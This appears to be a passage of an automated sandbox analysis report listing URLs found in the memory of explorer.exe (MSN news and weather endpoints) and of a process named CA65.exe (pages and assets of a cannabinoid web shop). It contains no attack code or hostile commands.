Source: explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1684862545.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1682291427.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1682291427.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1679822993.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1680290585.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1682291427.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1682291427.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: explorer.exe, 00000001.00000000.1682291427.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com#Organization
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/my-account/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/my-account/lost-password/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/my-cart/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/privacy-policy/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/accessories/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/cbc/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/cbd/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/cbg/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/cbn-o/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/cbn/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/cbt/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/concentrates/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/delta-10/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/delta-8/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/delta-8/delta-8-cart/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/delta-8/delta-8-distillate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/delta-8/delta-8-edibles/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/edibles/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/hexahydrocannabinol/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/hhc-o/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/hhc-p/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/isolates/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/thca/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/thcp/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/thcv/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/tinctures/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product-category/vapes/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/blood-orange-delta-8-thc-tincture-1500mg/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/broad-spectrum-cbd-distillate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/bulk-amber-delta-8-distillate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/bulk-cbd-isolate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/bulk-cbg-isolate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/bulk-delta-8-thc-sauce/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/bulk-hhc-distillate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/bulk-hhc-o-distillate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/bulk-hhc-sauce/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/bulk-thca-diamonds/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/buy-delta-8-thc-bulk/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/cbdv-isolate-1-gram/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/cbg-tincture/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/cbn-isolate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/cbn-o-isolate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/cbn-tincture/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/cbt-isolate-1-gram/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/cdt-delta-8-minis-5-grams/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/d8-thc-cbn-cbd-tincture-relax-blend/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/d8thc-thcv-cbdv-tincture-focus-blend/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/delta-10-thc-distillate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/delta-8-sauce-mix-match-100g/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/delta-8-thc-chocolate-bars/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/delta-8-thc-terpene-infused-mini-jars/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/delta-8-thc-tincture/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/delta-8-thc-vape-cartridge-1-gram/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/delta-9-thc-gummies-sour-cherry/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/delta-9-thc-gummies-sour-watermelon/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/hhc-p-distillate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/hhc-tincture-1500mg/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/lemonade-delta-8-thc-tincture/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/mixed-berry-delta-8-thc-tincture-1500mg/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/raspberry-delta-8-thc-tincture/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/strawberries-and-cream-delta-8-thc-tincture/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/thca-diamonds-sauce/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/thcp-distillate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/thcv-cbdv-tincture/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/thcv-isolate/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/product/water-soluble-delta-8-thc/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/shop/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-admin/admin-ajax.php
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/cache/lws/lws_woorewards_free_product_templ
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/customer-reviews-woocommerce/css/fr
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-bulk-variations/assets/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-gateway-authorize-net-c
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-mix-and-match-products/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-product-bundles/assets/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-smart-refunder/assets/f
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-subscriptions/vendor/wo
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woorewards/assets/lws-adminpanel/st
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/themes/flatsome/assets/css/flatsome-shop.cs
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/cache/min/1/wp-content/themes/flatsome/assets/css/flatsome.css?ver
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/fonts/electrolize/cIf5Ma1dtE0zSiGSiED7AXEBuIlPQrfA.woff)
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/customer-reviews-woocommerce/js/colcade.js?ver=5.38.7
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/customer-reviews-woocommerce/js/frontend.js?ver=5.38.7
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/customer-reviews-woocommerce/js/slick.min.js?ver=3.119
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/flexible-shipping-ups-pro/build/style-point-selection-bloc
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/klaviyo/inc/js/kl-identify-browser.js?ver=3.3.3
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/perfmatters/vendor/instant-page/pminstantpage.min.js?ver=2
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce-bulk-variations/assets/js/wc-bulk-variations.j
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce-gateway-authorize-net-cim/assets/js/frontend/w
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce-gateway-authorize-net-cim/vendor/skyverge/wc-p
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-ski
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.min.css?ver=8
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce/assets/js/jquery-payment/jquery.payment.min.js
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe-ui-default.min
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe.min.js?ver=4.1
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woorewards/assets/lws-adminpanel/js/controls/lwsdial.js?ve
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woorewards/assets/lws-adminpanel/styling/css/controls/lwsd
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woorewards/modules/woorewards-pro/js/legacy/freeproduct.js
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woorewards/modules/woorewards-pro/js/popups/freeproduct.js
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woorewards/modules/woorewards-pro/styling/css/popups/freep
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/woorewards/styling/css/wr-elements.min.css?ver=5.2.8
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/plugins/wt-import-export-for-woo/public/css/wt-import-export-for-w
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome-child/style.css?ver=3.0
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.18.0)
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.18.0);
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.18.0#fl-icons)
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.18.0)
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.18.0)
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.18.0)
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.18.0
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.18.0
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.18.0
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=039f9485eef603e7c53a
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=c9fe40206165dd93147b
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/inc/extensions/flatsome-cookie-notice/flatsome-coo
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/themes/flatsome/inc/integrations/wp-rocket/flatsome-wp-rocket.js?v
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/uploads/2020/11/converted.png
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/uploads/2022/02/cannabis-leaves-banner.mp4
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/uploads/2022/06/Untitled-2000-
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/uploads/2023/05/CannaClear-Shop-Delta-8-THC-Products-Online-2.mp4
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-content/uploads/2023/10/cropped-CannaClear.com-Shop-Bulk-Delta-8-THC-THCa-
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-json/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-json/wp/v2/pages/19
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cannaclear.com/wp-login.php?loginSocial=google&redirect=https%3A%2F%2Fcannaclear.com%2F
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1680983414.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1680983414.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
